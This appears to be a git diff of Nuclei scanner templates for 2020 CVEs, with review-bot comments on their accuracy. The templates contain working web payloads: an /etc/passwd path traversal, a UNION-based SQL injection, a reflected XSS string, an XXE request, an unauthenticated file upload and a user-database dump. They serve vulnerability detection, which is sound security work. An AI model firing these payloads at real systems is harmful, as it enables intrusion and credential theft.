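Review bot: The template is titled `Sophos XG Firewall Pre-Auth SQL Injection` with `severity: critical`, but all it does is fetch the user-portal login page and match the word `loginstylesheet`; that string is presumably present on patched firewalls too, so every exposed Sophos XG user portal will be reported as a critical SQLi. Either rename it to reflect what it detects (e.g. `Sophos XG Firewall User Portal - Detect` with `severity: info`) or add a check tied to the vulnerable build. There is also no `description`, `reference` or `classification` block; the lone `#https://www.cvebase.com/cve/2020/12271` comment should become a `reference:` entry.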
@@ -0,0 +1,35 @@ +id: CVE-2020-12447 + +info: + name: Onkyo TX-NR585 Web Interface - Directory Traversal + author: 0x_Akoko + severity: high + description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + reference: + - https://blog.spookysec.net/onkyo-lfi + - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 + - https://blog.spookysec.net/onkyo-lfi/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-12447 + cwe-id: CWE-22 + tags: cve,cve2020,onkyo,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-13121.yaml b/nuclei-templates/CVE-2020/cve-2020-13121.yaml deleted file mode 100644 index 85e6f703ba..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-13121.yaml +++ /dev/null 
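Review bot: The `reference` list contains `https://blog.spookysec.net/onkyo-lfi` twice (with and without the trailing slash); drop one. The request has nothing Onkyo-specific — a bare `%2e%2e%2f` walk from the web root to `/etc/passwd` — so any device with a root-level traversal will be attributed to CVE-2020-12447; if the Onkyo web interface exposes a recognisable `Server` header or page string it would be worth adding as a second matcher, otherwise the description should state that the check is generic.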
@@ -1,34 +0,0 @@ -id: CVE-2020-13121 - -info: - name: Submitty 20.04.01 - Open redirect - author: 0x_Akoko - severity: medium - description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. - reference: - - https://github.com/Submitty/Submitty/issues/5265 - - https://www.cvedetails.com/cve/CVE-2020-13121 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-13121 - cwe-id: CWE-601 - tags: cve,cve2020,redirect,submitty,oos - -requests: - - raw: - - | - POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/authentication/login - - user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login - - cookie-reuse: true - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13167.yaml b/nuclei-templates/CVE-2020/cve-2020-13167.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-13167.yaml rename to nuclei-templates/CVE-2020/cve-2020-13167.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-13405.yaml b/nuclei-templates/CVE-2020/cve-2020-13405.yaml new file mode 100644 index 0000000000..12407d9ae9 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-13405.yaml 
@@ -0,0 +1,47 @@ +id: CVE-2020-13405 + +info: + name: MicroWeber - Unauthenticated User Database Disclosure + author: ritikchaddha,amit-jd + severity: high + description: | + The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. + reference: + - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 + - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-13405 + cwe-id: CWE-306 + metadata: + shodan-query: http.html:"microweber" + verified: "true" + tags: cve,cve2020,microweber,unauth,disclosure + +requests: + - raw: + - | + POST /module/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}admin/view:modules/load_module:users + + module={{endpoint}} + + payloads: + endpoint: + - "users/controller" + - "modules/users/controller" + - "/modules/users/controller" + + matchers: + - type: dsl + dsl: + - 'contains(body,"username")' + - 'contains(body,"password")' + - 'contains(body,"password_reset_hash")' + - 'status_code==200' + - 'contains(all_headers,"text/html")' + condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-13483.yaml b/nuclei-templates/CVE-2020/cve-2020-13483.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-13483.yaml rename to nuclei-templates/CVE-2020/cve-2020-13483.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14092.yaml b/nuclei-templates/CVE-2020/cve-2020-14092.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14092.yaml rename to nuclei-templates/CVE-2020/cve-2020-14092.yaml 
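Review bot: `Referer: {{BaseURL}}admin/view:modules/load_module:users` has no `/` between `{{BaseURL}}` and `admin`, so with a BaseURL of `https://host` it becomes `https://hostadmin/...`; use `{{BaseURL}}/admin/view:modules/load_module:users` (or `{{RootURL}}/admin/...`). The matcher also requires `password` and `password_reset_hash` in the body, meaning a positive result returns the full users table including password hashes; consider noting in `description` that responses from this template contain credential material and should not be stored or shared unredacted.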
diff --git a/nuclei-templates/CVE-2020/cve-2020-14408.yaml b/nuclei-templates/CVE-2020/cve-2020-14408.yaml deleted file mode 100644 index 8f848663db..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-14408.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2020-14408 - -info: - name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting - author: edoardottt - severity: medium - description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-14408 - cwe-id: CWE-79 - reference: - - https://github.com/agentejo/cockpit/issues/1310 - - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 - metadata: - verified: true - tags: cve,cve2020,cockpit,agentejo,xss,oss - -requests: - - method: GET - path: - - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "redirectTo = '/92874';alert(document.domain)//280';" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14750.yaml b/nuclei-templates/CVE-2020/cve-2020-14750.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14750.yaml rename to nuclei-templates/CVE-2020/cve-2020-14750.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14882.yaml b/nuclei-templates/CVE-2020/cve-2020-14882.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14882.yaml rename to nuclei-templates/CVE-2020/cve-2020-14882.yaml 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-15004.yaml b/nuclei-templates/CVE-2020/cve-2020-15004.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15004.yaml rename to nuclei-templates/CVE-2020/cve-2020-15004.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15148.yaml b/nuclei-templates/CVE-2020/cve-2020-15148.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15148.yaml rename to nuclei-templates/CVE-2020/cve-2020-15148.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml b/nuclei-templates/CVE-2020/cve-2020-19282.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-19282.yaml rename to nuclei-templates/CVE-2020/cve-2020-19282.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-2096.yaml b/nuclei-templates/CVE-2020/cve-2020-2096.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-2096.yaml rename to nuclei-templates/CVE-2020/cve-2020-2096.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-22211.yaml b/nuclei-templates/CVE-2020/cve-2020-22211.yaml deleted file mode 100644 index a303d4b08f..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-22211.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2020-22211 - -info: - name: 74cms - ajax_street.php 'key' SQL Injection - author: ritikchaddha - severity: critical - description: | - SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. - reference: - - https://github.com/blindkey/cve_like/issues/13 - - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-22210 - cwe-id: CWE-89 - metadata: - fofa-query: app="74cms" - shodan-query: http.html:"74cms" - tags: cve,cve2020,74cms,sqli - -variables: - num: "999999999" - -requests: - - method: GET - path: - - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by cs on 2022/06/21 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24223.yaml b/nuclei-templates/CVE-2020/cve-2020-24223.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24223.yaml rename to nuclei-templates/CVE-2020/cve-2020-24223.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24312.yaml b/nuclei-templates/CVE-2020/cve-2020-24312.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24312.yaml rename to nuclei-templates/CVE-2020/cve-2020-24312.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24391.yaml b/nuclei-templates/CVE-2020/cve-2020-24391.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24391.yaml rename to nuclei-templates/CVE-2020/cve-2020-24391.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24550.yaml b/nuclei-templates/CVE-2020/cve-2020-24550.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24550.yaml rename to nuclei-templates/CVE-2020/cve-2020-24550.yaml 
diff --git a/nuclei-templates/CVE-2020/cve-2020-24589.yaml b/nuclei-templates/CVE-2020/cve-2020-24589.yaml deleted file mode 100644 index 85c9c535b0..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-24589.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2020-24589 - -info: - name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection - author: lethargynavigator - severity: critical - description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend - or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H - cvss-score: 9.1 - cve-id: CVE-2020-24589 - tags: cve,cve2020,wso2,xxe,oast,blind - -requests: - - raw: - - | - POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]> - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "Failed to install the generic artifact type" - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24609.yaml b/nuclei-templates/CVE-2020/cve-2020-24609.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24609.yaml rename to nuclei-templates/CVE-2020/cve-2020-24609.yaml 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-24949.yaml b/nuclei-templates/CVE-2020/cve-2020-24949.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24949.yaml rename to nuclei-templates/CVE-2020/cve-2020-24949.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-25078.yaml b/nuclei-templates/CVE-2020/cve-2020-25078.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-25078.yaml rename to nuclei-templates/CVE-2020/cve-2020-25078.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-25864.yaml b/nuclei-templates/CVE-2020/cve-2020-25864.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-25864.yaml rename to nuclei-templates/CVE-2020/cve-2020-25864.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-27735.yaml b/nuclei-templates/CVE-2020/cve-2020-27735.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-27735.yaml rename to nuclei-templates/CVE-2020/cve-2020-27735.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-27986.yaml b/nuclei-templates/CVE-2020/cve-2020-27986.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-27986.yaml rename to nuclei-templates/CVE-2020/cve-2020-27986.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28188.yaml b/nuclei-templates/CVE-2020/cve-2020-28188.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28188.yaml rename to nuclei-templates/CVE-2020/cve-2020-28188.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28208.yaml b/nuclei-templates/CVE-2020/cve-2020-28208.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28208.yaml rename to nuclei-templates/CVE-2020/cve-2020-28208.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28351.yaml b/nuclei-templates/CVE-2020/cve-2020-28351.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28351.yaml rename to nuclei-templates/CVE-2020/cve-2020-28351.yaml 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml b/nuclei-templates/CVE-2020/cve-2020-28871.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-28871.yaml rename to nuclei-templates/CVE-2020/cve-2020-28871.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-29453.yaml b/nuclei-templates/CVE-2020/cve-2020-29453.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-29453.yaml rename to nuclei-templates/CVE-2020/cve-2020-29453.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-29597.yaml b/nuclei-templates/CVE-2020/cve-2020-29597.yaml deleted file mode 100644 index 250129bae7..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-29597.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2020-29597 - -info: - name: IncomCMS 2.0 - Arbitrary File Upload - author: princechaddha - severity: critical - description: | - IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. - reference: - - https://github.com/Trhackno/CVE-2020-29597 - - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 - - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md - - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-29597 - cwe-id: CWE-434 - metadata: - verified: "true" - tags: cve,cve2020,incomcms,fileupload,intrusive - -requests: - - raw: - - | - POST /incom/modules/uploader/showcase/script.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt - - ------WebKitFormBoundaryBEJZt0IK73M2mAbt - Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png" - Content-Type: text/html - - {{randstr_2}} - ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - - - | - GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - '{"status":"1","name":"{{randstr_1}}.png"}' - - - type: word - part: body_2 - words: - - '{{randstr_2}}' - -# Enhanced by CS 06/06/2022 diff --git a/nuclei-templates/CVE-2020/cve-2020-35234.yaml b/nuclei-templates/CVE-2020/cve-2020-35234.yaml new file mode 100644 index 0000000000..62acb0ba37 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-35234.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2020-35234 + +info: + name: SMTP WP Plugin Directory Listing + author: PR3R00T + severity: high + description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 + - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + - https://wordpress.org/plugins/easy-wp-smtp/#developers + remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-35234 + cwe-id: CWE-532 + tags: cve,cve2020,wordpress,wp-plugin,smtp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" + + matchers: + - type: word + words: + - "debug" + - "log" + - "Index of" + condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-35476.yaml b/nuclei-templates/CVE-2020/cve-2020-35476.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35476.yaml rename to nuclei-templates/CVE-2020/cve-2020-35476.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35729.yaml b/nuclei-templates/CVE-2020/cve-2020-35729.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35729.yaml rename to nuclei-templates/CVE-2020/cve-2020-35729.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35736.yaml b/nuclei-templates/CVE-2020/cve-2020-35736.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35736.yaml rename to nuclei-templates/CVE-2020/cve-2020-35736.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-3580.yaml b/nuclei-templates/CVE-2020/cve-2020-3580.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-3580.yaml rename to nuclei-templates/CVE-2020/cve-2020-3580.yaml 
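Review bot: The second path, `/wp-content/plugins/wp-mail-smtp-pro/`, belongs to a different plugin than the Easy WP SMTP plugin named in the description, so a directory listing there would be reported under CVE-2020-35234 although nothing in the referenced advisory covers it; drop it or move it to its own template. The word matcher also accepts any directory listing that merely contains the substrings `debug` and `log`, which is weak evidence that the exposed log itself is present — if the plugin's log file naming is known, match that name, and add `- type: status` / `status:` / `- 200` under a `matchers-condition: and` so error pages and soft-404s are not counted. `part: body` is the default here, but stating it explicitly keeps the matcher consistent with the other templates in this commit.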
diff --git a/nuclei-templates/CVE-2020/CVE-2020-35848.yaml b/nuclei-templates/CVE-2020/cve-2020-35848.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35848.yaml rename to nuclei-templates/CVE-2020/cve-2020-35848.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-36112.yaml b/nuclei-templates/CVE-2020/cve-2020-36112.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-36112.yaml rename to nuclei-templates/CVE-2020/cve-2020-36112.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-36287.yaml b/nuclei-templates/CVE-2020/cve-2020-36287.yaml deleted file mode 100644 index 0c9333c65c..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-36287.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2020-36287 - -info: - name: Jira Dashboard Gadgets / Information Disclosure - author: Jafar_Abo_Nada - severity: medium - description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. - tags: cve,cve2020,jira,atlassian,disclosure - reference: | - - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 - - # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs - -requests: - - raw: - - | - GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - | - GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - "contains(body_1, '')" - - "status_code_2 != 401" - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-5405.yaml b/nuclei-templates/CVE-2020/cve-2020-5405.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-5405.yaml rename to nuclei-templates/CVE-2020/cve-2020-5405.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-5410.yaml b/nuclei-templates/CVE-2020/cve-2020-5410.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-5410.yaml rename to nuclei-templates/CVE-2020/cve-2020-5410.yaml 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-6287.yaml b/nuclei-templates/CVE-2020/cve-2020-6287.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-6287.yaml rename to nuclei-templates/CVE-2020/cve-2020-6287.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7209.yaml b/nuclei-templates/CVE-2020/cve-2020-7209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7209.yaml rename to nuclei-templates/CVE-2020/cve-2020-7209.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-7246.yaml b/nuclei-templates/CVE-2020/cve-2020-7246.yaml new file mode 100644 index 0000000000..bafb26ecdf --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-7246.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-7246 + +info: + name: qdPM Authenticated Remote Code Execution + author: medbsq + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/qdPM/" + - "{{BaseURL}}/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers: + - type: word + words: + - "qdPM 9." + part: body + # https://www.cvebase.com/cve/2020/7246 diff --git a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml b/nuclei-templates/CVE-2020/cve-2020-7247.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7247.yaml rename to nuclei-templates/CVE-2020/cve-2020-7247.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7318.yaml b/nuclei-templates/CVE-2020/cve-2020-7318.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7318.yaml rename to nuclei-templates/CVE-2020/cve-2020-7318.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7796.yaml b/nuclei-templates/CVE-2020/cve-2020-7796.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7796.yaml rename to nuclei-templates/CVE-2020/cve-2020-7796.yaml 
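Review bot: The name claims "Authenticated Remote Code Execution", but the only check is the string `qdPM 9.` in the page body, which is a version fingerprint that will also flag qdPM 9.x builds that are patched, and no authenticated request is sent at all; the name should say so, e.g. `name: qdPM 9.x Detect (CVE-2020-7246 version fingerprint)`, with a comment that the template cannot confirm exploitability. The `info` block is also missing `description`, a `reference` list (the cvebase link only appears in a trailing comment), `classification` and `tags`, unlike the other new templates in this commit such as CVE-2021-21799. The hard-coded `User-Agent` header has no bearing on the match and can be dropped.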
diff --git a/nuclei-templates/CVE-2020/CVE-2020-8191.yaml b/nuclei-templates/CVE-2020/cve-2020-8191.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8191.yaml rename to nuclei-templates/CVE-2020/cve-2020-8191.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8497.yaml b/nuclei-templates/CVE-2020/cve-2020-8497.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8497.yaml rename to nuclei-templates/CVE-2020/cve-2020-8497.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml b/nuclei-templates/CVE-2020/cve-2020-8515.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8515.yaml rename to nuclei-templates/CVE-2020/cve-2020-8515.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8654.yaml b/nuclei-templates/CVE-2020/cve-2020-8654.yaml deleted file mode 100644 index 014f5cb558..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-8654.yaml +++ /dev/null 
@@ -1,49 +0,0 @@ -id: CVE-2020-8654 - -info: - name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution - author: praetorian-thendrickson - severity: high - description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. - reference: - - https://github.com/h4knet/eonrce - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb - - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8654 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-8654 - cwe-id: CWE-78 - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 - -requests: - - method: GET - path: - - "{{BaseURL}}/css/eonweb.css" - - extractors: - - type: regex - name: version - internal: true - part: body - group: 1 - regex: - - '# VERSION : ([0-9.]+)' - - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version, '< 5.4', '>= 5.1') - - - type: word - part: body - words: - - "EyesOfNetwork" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8813.yaml b/nuclei-templates/CVE-2020/cve-2020-8813.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8813.yaml rename to nuclei-templates/CVE-2020/cve-2020-8813.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9054.yaml b/nuclei-templates/CVE-2020/cve-2020-9054.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9054.yaml rename to nuclei-templates/CVE-2020/cve-2020-9054.yaml 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-9315.yaml b/nuclei-templates/CVE-2020/cve-2020-9315.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9315.yaml rename to nuclei-templates/CVE-2020/cve-2020-9315.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9425.yaml b/nuclei-templates/CVE-2020/cve-2020-9425.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9425.yaml rename to nuclei-templates/CVE-2020/cve-2020-9425.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9483.yaml b/nuclei-templates/CVE-2020/cve-2020-9483.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9483.yaml rename to nuclei-templates/CVE-2020/cve-2020-9483.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9490.yaml b/nuclei-templates/CVE-2020/cve-2020-9490.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9490.yaml rename to nuclei-templates/CVE-2020/cve-2020-9490.yaml diff --git a/nuclei-templates/CVE-2020/cve-20200924a(1).yaml b/nuclei-templates/CVE-2020/cve-20200924a(1).yaml deleted file mode 100644 index 2f0b34a3f6..0000000000 --- a/nuclei-templates/CVE-2020/cve-20200924a(1).yaml +++ /dev/null 
